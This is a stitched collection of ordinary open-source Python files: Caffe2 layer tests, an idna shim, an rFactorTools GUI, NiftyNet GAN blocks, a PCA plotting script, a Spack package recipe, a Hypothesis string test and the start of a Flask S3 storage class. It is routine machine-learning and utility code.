indices_record = self.new_record(schema.Scalar(np.int32))
input_record = schema.Struct(
('indices', indices_record),
('record', record),
)
schema.FeedRecord(
input_record,
[indices, dense, lengths, items, lengths, items_lengths,
items_items])
gathered_record = self.model.GatherRecord(input_record)
self.assertTrue(schema.equal_schemas(gathered_record, record))
self.run_train_net_forward_only()
gathered_dense = workspace.FetchBlob(gathered_record.dense())
np.testing.assert_array_equal(
np.concatenate([dense[i:i + 1] for i in indices]), gathered_dense)
gathered_lengths = workspace.FetchBlob(
gathered_record.sparse.list.lengths())
np.testing.assert_array_equal(
np.concatenate([lengths[i:i + 1] for i in indices]),
gathered_lengths)
gathered_items = workspace.FetchBlob(
gathered_record.sparse.list.items())
offsets = lengths.cumsum() - lengths
np.testing.assert_array_equal(
np.concatenate([
items[offsets[i]: offsets[i] + lengths[i]]
for i in indices
]), gathered_items)
gathered_items_lengths = workspace.FetchBlob(
gathered_record.sparse.list_of_list.items.lengths())
np.testing.assert_array_equal(
np.concatenate([
items_lengths[offsets[i]: offsets[i] + lengths[i]]
for i in indices
]),
gathered_items_lengths
)
nested_offsets = []
nested_lengths = []
nested_offset = 0
j = 0
for l in lengths:
nested_offsets.append(nested_offset)
nested_length = 0
for _i in range(l):
nested_offset += items_lengths[j]
nested_length += items_lengths[j]
j += 1
nested_lengths.append(nested_length)
gathered_items_items = workspace.FetchBlob(
gathered_record.sparse.list_of_list.items.items())
np.testing.assert_array_equal(
np.concatenate([
items_items[nested_offsets[i]:
nested_offsets[i] + nested_lengths[i]]
for i in indices
]),
gathered_items_items
)
def testMapToRange(self):
input_record = self.new_record(schema.Scalar(np.int32))
indices_blob = self.model.MapToRange(input_record,
max_index=100).indices
self.model.output_schema = schema.Struct()
train_init_net, train_net = self.get_training_nets()
schema.FeedRecord(
input_record,
[np.array([10, 3, 20, 99, 15, 11, 3, 11], dtype=np.int32)]
)
workspace.RunNetOnce(train_init_net)
workspace.RunNetOnce(train_net)
indices = workspace.FetchBlob(indices_blob())
np.testing.assert_array_equal(
np.array([1, 2, 3, 4, 5, 6, 2, 6], dtype=np.int32),
indices
)
schema.FeedRecord(
input_record,
[np.array([10, 3, 23, 35, 60, 15, 10, 15], dtype=np.int32)]
)
workspace.RunNetOnce(train_net)
indices = workspace.FetchBlob(indices_blob())
np.testing.assert_array_equal(
np.array([1, 2, 7, 8, 9, 5, 1, 5], dtype=np.int32),
indices
)
eval_net = self.get_eval_net()
schema.FeedRecord(
input_record,
[np.array([10, 3, 23, 35, 60, 15, 200], dtype=np.int32)]
)
workspace.RunNetOnce(eval_net)
indices = workspace.FetchBlob(indices_blob())
np.testing.assert_array_equal(
np.array([1, 2, 7, 8, 9, 5, 0], dtype=np.int32),
indices
)
schema.FeedRecord(
input_record,
[np.array([10, 3, 23, 15, 101, 115], dtype=np.int32)]
)
workspace.RunNetOnce(eval_net)
indices = workspace.FetchBlob(indices_blob())
np.testing.assert_array_equal(
np.array([1, 2, 7, 5, 0, 0], dtype=np.int32),
indices
)
predict_net = self.get_predict_net()
schema.FeedRecord(
input_record,
[np.array([3, 3, 20, 23, 151, 35, 60, 15, 200], dtype=np.int32)]
)
workspace.RunNetOnce(predict_net)
indices = workspace.FetchBlob(indices_blob())
np.testing.assert_array_equal(
np.array([2, 2, 3, 7, 0, 8, 9, 5, 0], dtype=np.int32),
indices
)
def testSelectRecordByContext(self):
float_features = self.model.input_feature_schema.float_features
float_array = np.array([1.0, 2.0], dtype=np.float32)
schema.FeedRecord(float_features, [float_array])
with Tags(Tags.EXCLUDE_FROM_PREDICTION):
log_float_features = self.model.Log(float_features, 1)
joined = self.model.SelectRecordByContext(
schema.Struct(
(InstantiationContext.PREDICTION, float_features),
(InstantiationContext.TRAINING, log_float_features),
# TODO: TRAIN_ONLY layers are also generated in eval
(InstantiationContext.EVAL, log_float_features),
)
)
# model.output_schema has to a struct
self.model.output_schema = schema.Struct((
'joined', joined
))
predict_net = layer_model_instantiator.generate_predict_net(self.model)
workspace.RunNetOnce(predict_net)
predict_output = schema.FetchRecord(predict_net.output_record())
npt.assert_array_equal(float_array,
predict_output['joined']())
eval_net = layer_model_instantiator.generate_eval_net(self.model)
workspace.RunNetOnce(eval_net)
eval_output = schema.FetchRecord(eval_net.output_record())
npt.assert_array_equal(np.log(float_array),
eval_output['joined']())
_, train_net = (
layer_model_instantiator.generate_training_nets_forward_only(
self.model
)
)
workspace.RunNetOnce(train_net)
train_output = schema.FetchRecord(train_net.output_record())
npt.assert_array_equal(np.log(float_array),
train_output['joined']())
def testFunctionalLayer(self):
def normalize(net, in_record, out_record):
mean = net.ReduceFrontMean(in_record(), 1)
net.Sub(
[in_record(), mean],
out_record(),
broadcast=1)
normalized = self.model.Functional(
self.model.input_feature_schema.float_features, 1,
normalize, name="normalizer")
# Attach metadata to one of the outputs and use it in FC
normalized.set_type((np.float32, 32))
self.model.output_schema = self.model.FC(normalized, 2)
predict_net = layer_model_instantiator.generate_predict_net(
self.model)
ops = predict_net.Proto().op
assert len(ops) == 3
assert ops[0].type == "ReduceFrontMean"
assert ops[1].type == "Sub"
assert ops[2].type == "FC"
assert len(ops[0].input) == 1
assert ops[0].input[0] ==\
self.model.input_feature_schema.float_features()
assert len(ops[1].output) == 1
assert ops[1].output[0] in ops[2].input
def testFunctionalLayerHelper(self):
mean = self.model.ReduceFrontMean(
self.model.input_feature_schema.float_features, 1)
normalized = self.model.Sub(
schema.Tuple(
self.model.input_feature_schema.float_features, mean),
1, broadcast=1)
# Attach metadata to one of the outputs and use it in FC
normalized.set_type((np.float32, (32,)))
self.model.output_schema = self.model.FC(normalized, 2)
predict_net = layer_model_instantiator.generate_predict_net(
self.model)
ops = predict_net.Proto().op
assert len(ops) == 3
assert ops[0].type == "ReduceFrontMean"
assert ops[1].type == "Sub"
assert ops[2].type == "FC"
assert len(ops[0].input) == 1
assert ops[0].input[0] ==\
self.model.input_feature_schema.float_features()
assert len(ops[1].output) == 1
assert ops[1].output[0] in ops[2].input
def testFunctionalLayerHelperAutoInference(self):
softsign = self.model.Softsign(
schema.Tuple(self.model.input_feature_schema.float_features),
1)
assert softsign.field_type().base == np.float32
assert softsign.field_type().shape == (32,)
self.model.output_schema = self.model.FC(softsign, 2)
predict_net = layer_model_instantiator.generate_predict_net(
self.model)
ops = predict_net.Proto().op
assert len(ops) == 2
assert ops[0].type == "Softsign"
assert ops[1].type == "FC"
assert len(ops[0].input) == 1
assert ops[0].input[0] ==\
self.model.input_feature_schema.float_features()
assert len(ops[0].output) == 1
assert ops[0].output[0] in ops[1].input
def testFunctionalLayerHelperAutoInferenceScalar(self):
loss = self.model.AveragedLoss(self.model.input_feature_schema, 1)
self.assertEqual(1, len(loss.field_types()))
self.assertEqual(np.float32, loss.field_types()[0].base)
self.assertEqual(tuple(), loss.field_types()[0].shape)
def testFunctionalLayerInputCoercion(self):
one = self.model.global_constants['ONE']
two = self.model.Add([one, one], 1)
self.model.loss = two
self.run_train_net()
data = workspace.FetchBlob(two.field_blobs()[0])
np.testing.assert_array_equal([2.0], data)
def testFunctionalLayerWithOutputNames(self):
k = 3
topk = self.model.TopK(
self.model.input_feature_schema,
output_names_or_num=['values', 'indices'],
k=k,
)
self.assertEqual(2, len(topk.field_types()))
self.assertEqual(np.float32, topk.field_types()[0].base)
self.assertEqual((k,), topk.field_types()[0].shape)
self.assertEqual(np.int32, topk.field_types()[1].base)
self.assertEqual((k,), topk.field_types()[1].shape)
self.assertEqual(['TopK/values', 'TopK/indices'], topk.field_blobs())
def testFunctionalLayerSameOperatorOutputNames(self):
Con1 = self.model.ConstantFill([], 1, value=1)
Con2 = self.model.ConstantFill([], 1, value=2)
self.assertNotEqual(str(Con1), str(Con2))
def testFunctionalLayerWithOutputDtypes(self):
loss = self.model.AveragedLoss(
self.model.input_feature_schema,
1,
output_dtypes=(np.float32, (1,)),
)
self.assertEqual(1, len(loss.field_types()))
self.assertEqual(np.float32, loss.field_types()[0].base)
self.assertEqual((1,), loss.field_types()[0].shape)
def testPropagateRequestOnly(self):
# test case when output is request only
input_record = self.new_record(schema.Struct(
('input1', schema.Scalar((np.float32, (32, )))),
('input2', schema.Scalar((np.float32, (64, )))),
('input3', schema.Scalar((np.float32, (16, )))),
))
set_request_only(input_record)
concat_output = self.model.Concat(input_record)
self.assertEqual(is_request_only_scalar(concat_output), True)
# test case when output is not request only
input_record2 = self.new_record(schema.Struct(
('input4', schema.Scalar((np.float32, (100, ))))
)) + input_record
concat_output2 = self.model.Concat(input_record2)
self.assertEqual(is_request_only_scalar(concat_output2), False)
def testSetRequestOnly(self):
input_record = schema.Scalar(np.int64)
schema.attach_metadata_to_scalars(
input_record,
schema.Metadata(
categorical_limit=100000000,
expected_value=99,
feature_specs=schema.FeatureSpec(
feature_ids=[1, 100, 1001]
)
)
)
set_request_only(input_record)
self.assertEqual(input_record.metadata.categorical_limit, 100000000)
self.assertEqual(input_record.metadata.expected_value, 99)
self.assertEqual(
input_record.metadata.feature_specs.feature_ids,
[1, 100, 1001]
)
@given(
X=hu.arrays(dims=[5, 5]), # Shape of X is irrelevant
)
def testDropout(self, X):
input_record = self.new_record(schema.Scalar((np.float32, (1,))))
schema.FeedRecord(input_record, [X])
d_output = self.model.Dropout(input_record)
self.assertEqual(schema.Scalar((np.float32, (1,))), d_output)
self.model.output_schema = schema.Struct()
train_init_net, train_net = self.get_training_nets()
input_blob = input_record.field_blobs()[0]
output_blob = d_output.field_blobs()[0]
train_d_spec = OpSpec(
"Dropout",
[input_blob],
[output_blob, None],
{'is_test': 0, 'ratio': 0.5}
)
test_d_spec = OpSpec(
"Dropout",
[input_blob],
[output_blob, None],
{'is_test': 1, 'ratio': 0.5}
)
self.assertNetContainOps(
train_net,
[train_d_spec]
)
eval_net = self.get_eval_net()
self.assertNetContainOps(
eval_net,
[test_d_spec]
)
predict_net = self.get_predict_net()
self.assertNetContainOps(
predict_net,
[test_d_spec]
)
workspace.RunNetOnce(train_init_net)
workspace.RunNetOnce(train_net)
schema.FeedRecord(input_record, [X])
workspace.RunNetOnce(eval_net)
schema.FeedRecord(input_record, [X])
workspace.RunNetOnce(predict_net)
@given(
num_inputs=st.integers(1, 3),
batch_size=st.integers(5, 10)
)
def testMergeIdListsLayer(self, num_inputs, batch_size):
inputs = []
for _ in range(num_inputs):
lengths = np.random.randint(5, size=batch_size).astype(np.int32)
size = lengths.sum()
values = np.random.randint(1, 10, size=size).astype(np.int64)
inputs.append(lengths)
inputs.append(values)
input_schema = schema.Tuple(
*[schema.List(
schema.Scalar(dtype=np.int64, metadata=schema.Metadata(
categorical_limit=20
))) for _ in range(num_inputs)]
)
input_record = schema.NewRecord(self.model.net, input_schema)
schema.FeedRecord(input_record, inputs)
output_schema = self.model.MergeIdLists(input_record)
assert schema.equal_schemas(
output_schema, IdList,
check_field_names=False)
@given(
batch_size=st.integers(min_value=2, max_value=10),
input_dims=st.integers(min_value=5, max_value=10),
output_dims=st.integers(min_value=5, max_value=10),
bandwidth=st.floats(min_value=0.1, max_value=5),
)
def testRandomFourierFeatures(self, batch_size, input_dims, output_dims, bandwidth):
def _rff_hypothesis_test(rff_output, X, W, b, scale):
"""
            Runs hypothesis test for Random Fourier Features layer.
Inputs:
rff_output -- output of net after running random fourier features layer
X -- input data
W -- weight parameter from train_init_net
b -- bias parameter from train_init_net
scale -- value by which to scale the output vector
"""
output = workspace.FetchBlob(rff_output)
output_ref = scale * np.cos(np.dot(X, np.transpose(W)) + b)
npt.assert_allclose(output, output_ref, rtol=1e-3, atol=1e-3)
X = np.random.random((batch_size, input_dims)).astype(np.float32)
scale = np.sqrt(2.0 / output_dims)
input_record = self.new_record(schema.Scalar((np.float32, (input_dims,))))
schema.FeedRecord(input_record, [X])
input_blob = input_record.field_blobs()[0]
rff_output = self.model.RandomFourierFeatures(input_record,
output_dims,
bandwidth)
self.model.output_schema = schema.Struct()
self.assertEqual(
schema.Scalar((np.float32, (output_dims, ))),
rff_output
)
train_init_net, train_net = self.get_training_nets()
# Init net assertions
init_ops_list = [
OpSpec("GaussianFill", None, None),
OpSpec("UniformFill", None, None),
]
init_ops = self._test_net(train_init_net, init_ops_list)
W = workspace.FetchBlob(self.model.layers[0].w)
b = workspace.FetchBlob(self.model.layers[0].b)
# Operation specifications
fc_spec = OpSpec("FC", [input_blob, init_ops[0].output[0],
init_ops[1].output[0]], None)
cosine_spec = OpSpec("Cos", None, None)
scale_spec = OpSpec("Scale", None, rff_output.field_blobs(),
{'scale': scale})
ops_list = [
fc_spec,
cosine_spec,
scale_spec
]
# Train net assertions
self._test_net(train_net, ops_list)
_rff_hypothesis_test(rff_output(), X, W, b, scale)
# Eval net assertions
eval_net = self.get_eval_net()
self._test_net(eval_net, ops_list)
_rff_hypothesis_test(rff_output(), X, W, b, scale)
# Predict net assertions
predict_net = self.get_predict_net()
self._test_net(predict_net, ops_list)
_rff_hypothesis_test(rff_output(), X, W, b, scale)
@given(
batch_size=st.integers(min_value=2, max_value=10),
input_dims=st.integers(min_value=5, max_value=10),
output_dims=st.integers(min_value=5, max_value=10),
s=st.integers(min_value=0, max_value=3),
scale=st.floats(min_value=0.1, max_value=5),
set_weight_as_global_constant=st.booleans()
)
def testArcCosineFeatureMap(self, batch_size, input_dims, output_dims, s, scale,
set_weight_as_global_constant):
def _arc_cosine_hypothesis_test(ac_output, X, W, b, s):
"""
Runs hypothesis test for Arc Cosine layer.
Inputs:
ac_output -- output of net after running arc cosine layer
X -- input data
W -- weight parameter from train_init_net
b -- bias parameter from train_init_net
s -- degree parameter
"""
# Get output from net
net_output = workspace.FetchBlob(ac_output)
# Computing output directly
x_rand = np.matmul(X, np.transpose(W)) + b
x_pow = np.power(x_rand, s)
if s > 0:
h_rand_features = np.piecewise(x_rand,
[x_rand <= 0, x_rand > 0],
[0, 1])
else:
h_rand_features = np.piecewise(x_rand,
[x_rand <= 0, x_rand > 0],
[0, lambda x: x / (1 + x)])
output_ref = np.multiply(x_pow, h_rand_features)
# Comparing net output and computed output
npt.assert_allclose(net_output, output_ref, rtol=1e-3, atol=1e-3)
X = np.random.normal(size=(batch_size, input_dims)).astype(np.float32)
input_record = self.new_record(schema.Scalar((np.float32, (input_dims,))))
schema.FeedRecord(input_record, [X])
input_blob = input_record.field_blobs()[0]
ac_output = self.model.ArcCosineFeatureMap(
input_record,
output_dims,
s=s,
scale=scale,
set_weight_as_global_constant=set_weight_as_global_constant
)
self.model.output_schema = schema.Struct()
self.assertEqual(
schema.Scalar((np.float32, (output_dims, ))),
ac_output
)
train_init_net, train_net = self.get_training_nets()
# Run create_init_net to initialize the global constants, and W and b
workspace.RunNetOnce(train_init_net)
workspace.RunNetOnce(self.model.create_init_net(name='init_net'))
if set_weight_as_global_constant:
W = workspace.FetchBlob(
self.model.global_constants['arc_cosine_feature_map_fixed_rand_W']
)
b = workspace.FetchBlob(
self.model.global_constants['arc_cosine_feature_map_fixed_rand_b']
)
else:
W = workspace.FetchBlob(self.model.layers[0].random_w)
b = workspace.FetchBlob(self.model.layers[0].random_b)
# Operation specifications
fc_spec = OpSpec("FC", [input_blob, None, None], None)
softsign_spec = OpSpec("Softsign", None, None)
relu_spec = OpSpec("Relu", None, None)
relu_spec_output = OpSpec("Relu", None, ac_output.field_blobs())
pow_spec = OpSpec("Pow", None, None, {'exponent': float(s - 1)})
mul_spec = OpSpec("Mul", None, ac_output.field_blobs())
if s == 0:
ops_list = [
fc_spec,
softsign_spec,
relu_spec_output,
]
elif s == 1:
ops_list = [
fc_spec,
relu_spec_output,
]
else:
ops_list = [
fc_spec,
relu_spec,
pow_spec,
mul_spec,
]
# Train net assertions
self._test_net(train_net, ops_list)
_arc_cosine_hypothesis_test(ac_output(), X, W, b, s)
# Eval net assertions
eval_net = self.get_eval_net()
self._test_net(eval_net, ops_list)
_arc_cosine_hypothesis_test(ac_output(), X, W, b, s)
# Predict net assertions
predict_net = self.get_predict_net()
self._test_net(predict_net, ops_list)
_arc_cosine_hypothesis_test(ac_output(), X, W, b, s)
@given(
batch_size=st.integers(min_value=2, max_value=10),
input_dims=st.integers(min_value=5, max_value=10),
output_dims=st.integers(min_value=5, max_value=10),
s=st.integers(min_value=0, max_value=3),
scale=st.floats(min_value=0.1, max_value=5),
set_weight_as_global_constant=st.booleans(),
use_struct_input=st.booleans(),
)
def testSemiRandomFeatures(self, batch_size, input_dims, output_dims, s, scale,
set_weight_as_global_constant, use_struct_input):
def _semi_random_hypothesis_test(srf_output, X_full, X_random, rand_w,
rand_b, s):
"""
Runs hypothesis test for Semi Random Features layer.
Inputs:
srf_output -- output of net after running semi random features layer
X_full -- full input data
X_random -- random-output input data
rand_w -- random-initialized weight parameter from train_init_net
rand_b -- random-initialized bias parameter from train_init_net
s -- degree parameter
"""
# Get output from net
net_output = workspace.FetchBlob(srf_output)
# Fetch learned parameter blobs
learned_w = workspace.FetchBlob(self.model.layers[0].learned_w)
learned_b = workspace.FetchBlob(self.model.layers[0].learned_b)
# Computing output directly
x_rand = np.matmul(X_random, np.transpose(rand_w)) + rand_b
x_learn = np.matmul(X_full, np.transpose(learned_w)) + learned_b
x_pow = np.power(x_rand, s)
if s > 0:
h_rand_features = np.piecewise(x_rand,
[x_rand <= 0, x_rand > 0],
[0, 1])
else:
h_rand_features = np.piecewise(x_rand,
[x_rand <= 0, x_rand > 0],
[0, lambda x: x / (1 + x)])
output_ref = np.multiply(np.multiply(x_pow, h_rand_features), x_learn)
# Comparing net output and computed output
npt.assert_allclose(net_output, output_ref, rtol=1e-3, atol=1e-3)
X_full = np.random.normal(size=(batch_size, input_dims)).astype(np.float32)
if use_struct_input:
X_random = np.random.normal(size=(batch_size, input_dims)).\
astype(np.float32)
input_data = [X_full, X_random]
input_record = self.new_record(schema.Struct(
('full', schema.Scalar(
(np.float32, (input_dims,))
)),
('random', schema.Scalar(
(np.float32, (input_dims,))
))
))
else:
X_random = X_full
input_data = [X_full]
input_record = self.new_record(schema.Scalar(
(np.float32, (input_dims,))
))
schema.FeedRecord(input_record, input_data)
srf_output = self.model.SemiRandomFeatures(
input_record,
output_dims,
s=s,
scale_random=scale,
scale_learned=scale,
set_weight_as_global_constant=set_weight_as_global_constant
)
self.model.output_schema = schema.Struct()
self.assertEqual(
schema.Struct(
('full', schema.Scalar(
(np.float32, (output_dims,))
)),
('random', schema.Scalar(
(np.float32, (output_dims,))
))
),
srf_output
)
init_ops_list = [
OpSpec("GaussianFill", None, None),
OpSpec("UniformFill", None, None),
OpSpec("GaussianFill", None, None),
OpSpec("UniformFill", None, None),
]
train_init_net, train_net = self.get_training_nets()
# Need to run to initialize the global constants for layer
workspace.RunNetOnce(self.model.create_init_net(name='init_net'))
if set_weight_as_global_constant:
# If weight params are global constants, they won't be in train_init_net
init_ops = self._test_net(train_init_net, init_ops_list[:2])
rand_w = workspace.FetchBlob(
self.model.global_constants['semi_random_features_fixed_rand_W']
)
rand_b = workspace.FetchBlob(
self.model.global_constants['semi_random_features_fixed_rand_b']
)
# Operation specifications
fc_random_spec = OpSpec("FC", [None, None, None], None)
fc_learned_spec = OpSpec("FC", [None, init_ops[0].output[0],
init_ops[1].output[0]], None)
else:
init_ops = self._test_net(train_init_net, init_ops_list)
rand_w = workspace.FetchBlob(self.model.layers[0].random_w)
rand_b = workspace.FetchBlob(self.model.layers[0].random_b)
# Operation specifications
fc_random_spec = OpSpec("FC", [None, init_ops[0].output[0],
init_ops[1].output[0]], None)
fc_learned_spec = OpSpec("FC", [None, init_ops[2].output[0],
init_ops[3].output[0]], None)
softsign_spec = OpSpec("Softsign", None, None)
relu_spec = OpSpec("Relu", None, None)
relu_output_spec = OpSpec("Relu", None, srf_output.random.field_blobs())
pow_spec = OpSpec("Pow", None, None, {'exponent': float(s - 1)})
mul_interim_spec = OpSpec("Mul", None, srf_output.random.field_blobs())
mul_spec = OpSpec("Mul", None, srf_output.full.field_blobs())
if s == 0:
ops_list = [
fc_learned_spec,
fc_random_spec,
softsign_spec,
relu_output_spec,
mul_spec,
]
elif s == 1:
ops_list = [
fc_learned_spec,
fc_random_spec,
relu_output_spec,
mul_spec,
]
else:
ops_list = [
fc_learned_spec,
fc_random_spec,
relu_spec,
pow_spec,
mul_interim_spec,
mul_spec,
]
# Train net assertions
self._test_net(train_net, ops_list)
_semi_random_hypothesis_test(srf_output.full(), X_full, X_random,
rand_w, rand_b, s)
# Eval net assertions
eval_net = self.get_eval_net()
self._test_net(eval_net, ops_list)
_semi_random_hypothesis_test(srf_output.full(), X_full, X_random,
rand_w, rand_b, s)
# Predict net assertions
predict_net = self.get_predict_net()
self._test_net(predict_net, ops_list)
_semi_random_hypothesis_test(srf_output.full(), X_full, X_random,
rand_w, rand_b, s)
def testConv(self):
batch_size = 50
H = 1
W = 10
C = 50
output_dims = 32
kernel_h = 1
kernel_w = 3
stride_h = 1
stride_w = 1
pad_t = 0
pad_b = 0
pad_r = None
pad_l = None
input_record = self.new_record(schema.Scalar((np.float32, (H, W, C))))
X = np.random.random((batch_size, H, W, C)).astype(np.float32)
schema.FeedRecord(input_record, [X])
conv = self.model.Conv(
input_record,
output_dims,
kernel_h=kernel_h,
kernel_w=kernel_w,
stride_h=stride_h,
stride_w=stride_w,
pad_t=pad_t,
pad_b=pad_b,
pad_r=pad_r,
pad_l=pad_l,
order='NHWC'
)
self.assertEqual(
schema.Scalar((np.float32, (output_dims,))),
conv
)
self.run_train_net_forward_only()
output_record = schema.FetchRecord(conv)
# check the number of output channels is the same as input in this example
assert output_record.field_types()[0].shape == (H, W, output_dims)
assert output_record().shape == (batch_size, H, W, output_dims)
train_init_net, train_net = self.get_training_nets()
# Init net assertions
init_ops = self.assertNetContainOps(
train_init_net,
[
OpSpec("XavierFill", None, None),
OpSpec("ConstantFill", None, None),
]
)
conv_spec = OpSpec(
"Conv",
[
input_record.field_blobs()[0],
init_ops[0].output[0],
init_ops[1].output[0],
],
conv.field_blobs()
)
# Train net assertions
self.assertNetContainOps(train_net, [conv_spec])
# Predict net assertions
predict_net = self.get_predict_net()
self.assertNetContainOps(predict_net, [conv_spec])
# Eval net assertions
eval_net = self.get_eval_net()
self.assertNetContainOps(eval_net, [conv_spec])
| pietern/caffe2 | caffe2/python/layers_test.py | Python | apache-2.0 | 48,600 |
# Emulate the bare minimum for idna for the Swarming bot.
# In practice, we do not need it, and it's very large.
# See https://pypi.org/project/idna/
from encodings import idna
class IDNAError(Exception):
  # Referred to by requests/models.py
pass
class core(object):
class IDNAError(Exception):
    # Referred to by urllib3/contrib/pyopenssl.py
pass
def encode(host, uts46=False): # pylint: disable=unused-argument
# Used by urllib3
return idna.ToASCII(host)
def decode(host):
# Used by cryptography/hazmat/backends/openssl/x509.py
return idna.ToUnicode(host)
| endlessm/chromium-browser | tools/swarming_client/third_party/idna/__init__.py | Python | bsd-3-clause | 585 |
# rFactorTools GUI
# Copyright (C) 2014 Ingo Ruhnke <grumbel@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import argparse
import datetime
import logging
import os
import sys
from .converter_thread import ConverterThread
from .main_window import MainWindow
from .progress_window import ProgressWindow
from .text_window import TextWindow
class Application:
def __init__(self):
self.converter_thread = None
def start_conversion(self, source_directory, target_directory, cfg):
assert self.converter_thread is None
progress_window = ProgressWindow(self, self.gui_main_window)
self.converter_thread = ConverterThread(source_directory, target_directory, cfg)
self.converter_thread.progress_cb = progress_window.request
self.converter_thread.start()
progress_window.wait_for_conversion()
self.cancel_conversion()
progress_window = None
self.converter_thread = None
def cancel_conversion(self):
if self.converter_thread is not None:
self.converter_thread.cancel()
self.converter_thread.join()
def show_text_window(self, title, text):
text_window = TextWindow(self.gui_main_window)
text_window.title(title)
text_window.set_text(text)
def main(self):
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(levelname)s: %(message)s")
handler = logging.StreamHandler(sys.stderr)
handler.setLevel(logging.INFO)
handler.setFormatter(formatter)
logger.addHandler(handler)
time_str = datetime.datetime.now().strftime("%Y-%m-%dT%H%M%S")
if not os.path.isdir("logs"):
os.mkdir("logs")
handler = logging.FileHandler("logs/rfactortools-gui-%s.log" % time_str, mode='w')
handler.setLevel(logging.DEBUG)
handler.setFormatter(formatter)
logger.addHandler(handler)
parser = argparse.ArgumentParser(description='rFactor to GSC2013 converter')
parser.add_argument('INPUTDIR', action='store', type=str, nargs='?',
help='directory containing the mod')
parser.add_argument('OUTPUTDIR', action='store', type=str, nargs='?',
help='directory where the conversion will be written')
parser.add_argument('-s', '--start', action='store_true',
help='start conversion instantly')
args = parser.parse_args()
self.gui_main_window = MainWindow(self)
if args.INPUTDIR is not None:
self.gui_main_window.source_directory.set(args.INPUTDIR)
if args.OUTPUTDIR is not None:
self.gui_main_window.target_directory.set(args.OUTPUTDIR)
if args.start:
self.gui_main_window.do_conversion()
self.gui_main_window.mainloop()
# EOF #
| Grumbel/rfactortools | rfactortools/gui/application.py | Python | gpl-3.0 | 3,511 |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, division
import tensorflow as tf
from niftynet.layer.base_layer import TrainableLayer
class GANImageBlock(TrainableLayer):
def __init__(self,
generator,
discriminator,
clip=None,
name='GAN_image_block'):
self._generator = generator
self._discriminator = discriminator
self.clip = clip
super(GANImageBlock, self).__init__(name=name)
def layer_op(self,
random_source,
training_image,
conditioning,
is_training):
shape_to_generate = training_image.shape.as_list()[1:]
fake_image = self._generator(random_source,
shape_to_generate,
conditioning,
is_training)
fake_logits = self._discriminator(fake_image,
conditioning,
is_training)
if self.clip:
with tf.name_scope('clip_real_images'):
training_image = tf.maximum(
-self.clip,
tf.minimum(self.clip, training_image))
real_logits = self._discriminator(training_image,
conditioning,
is_training)
return fake_image, real_logits, fake_logits
class BaseGenerator(TrainableLayer):
def __init__(self, name='generator', *args, **kwargs):
super(BaseGenerator, self).__init__(name=name)
class BaseDiscriminator(TrainableLayer):
def __init__(self, name='discriminator', *args, **kwargs):
super(BaseDiscriminator, self).__init__(name=name)
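# Hedged wiring sketch: MyGenerator / MyDiscriminator are hypothetical
# TrainableLayer subclasses standing in for real NiftyNet networks; the
# block only composes them and (optionally) clips the real images.
#
#     gan = GANImageBlock(generator=MyGenerator(),
#                         discriminator=MyDiscriminator(),
#                         clip=1.0)
#     fake_image, real_logits, fake_logits = gan(noise,
#                                                training_image,
#                                                conditioning,
#                                                is_training=True)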
| NifTK/NiftyNet | niftynet/layer/gan_blocks.py | Python | apache-2.0 | 1,858 |
import matplotlib
matplotlib.use('Qt4Agg')
import numpy as np
import matplotlib.pyplot as plt
from sklearn.decomposition import PCA
from sklearn import datasets
import pandas as pd
df = pd.read_csv('sms/sms.csv')
y = df.label
X = df.message
from sklearn.feature_extraction.text import TfidfVectorizer
print('vectorizing')
vectorizer = TfidfVectorizer(max_df=0.5, min_df=3)
X = vectorizer.fit_transform(X)
print(X.shape)
# Map the string labels ('ham'/'spam') to integer codes so matplotlib can
# color the points; scattering the raw high-dimensional sparse TF-IDF
# matrix (as the removed lines here tried to) fails, so plot after PCA.
y = y.astype('category').cat.codes
# iris = datasets.load_iris()
# X = iris.data
# y = iris.target
pca = PCA(n_components=2)
print('fitting pca')
X = pca.fit_transform(X.toarray())
print('plotting')
plt.scatter(X[:, 0], X[:, 1], c=y)
plt.show()
 | moonbury/notebooks | github/MasteringMLWithScikit-learn/8365OS_07_Codes/pca-2d-plot.py | Python | gpl-3.0 | 677 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyPacificaUploader(PythonPackage):
"""Python Pacifica Uploader Library"""
homepage = "https://github.com/pacifica/pacifica-python-uploader/"
pypi = "pacifica-uploader/pacifica-uploader-0.3.1.tar.gz"
version('0.3.1', sha256='adda18b28f01f0b1e6fbaf927fec9b8cf07c86f1b74185bed2a624e8a4597578')
depends_on('py-setuptools', type='build')
depends_on('py-setuptools-scm', type='build')
depends_on('py-requests', type=('build', 'run'))
| LLNL/spack | var/spack/repos/builtin/packages/py-pacifica-uploader/package.py | Python | lgpl-2.1 | 689 |
from hypothesis import given
from hypothesis.strategies import text
@given(text())
def test_uppercase_and_reverse_are_commutable(s):
print(repr(s))
assert s.upper()[::-1] == s[::-1].upper()
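# Hedged note: Hypothesis does find real counterexamples here, because some
# characters expand under str.upper(). The 'fi' ligature U+FB01 is one:
#
#     s = "\ufb01"
#     s.upper()[::-1]   # 'IF'
#     s[::-1].upper()   # 'FI'
#
# so uppercasing and reversing do not commute for every string.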
| alexwlchan/alexwlchan.net | src/_files/2021/test_for_noncommutative_strings.py | Python | mit | 200 |
import boto3
from werkzeug.utils import secure_filename
from .utils import convert_to_snake_case
from . import AbstractStorage, StorageExists, StorageNotExists, StorageNotAllowed
#Enhancement: Upload needs to have proper permissions (public/private)
#Enhancement: The get_existing_files method needs to handle subfolders
class S3Storage(AbstractStorage):
def __init__(self, app):
super(S3Storage, self).__init__(app)
self.bucket_name = app.config.get("FILEUPLOAD_S3_BUCKET", "flask_fileupload")
self.acl = app.config.get("FILEUPLOAD_S3_ACL", "public-read")
self.s3 = boto3.client('s3')
self.s3_res = boto3.resource('s3')
response = self.s3.list_buckets()
buckets = [bucket['Name'] for bucket in response['Buckets']]
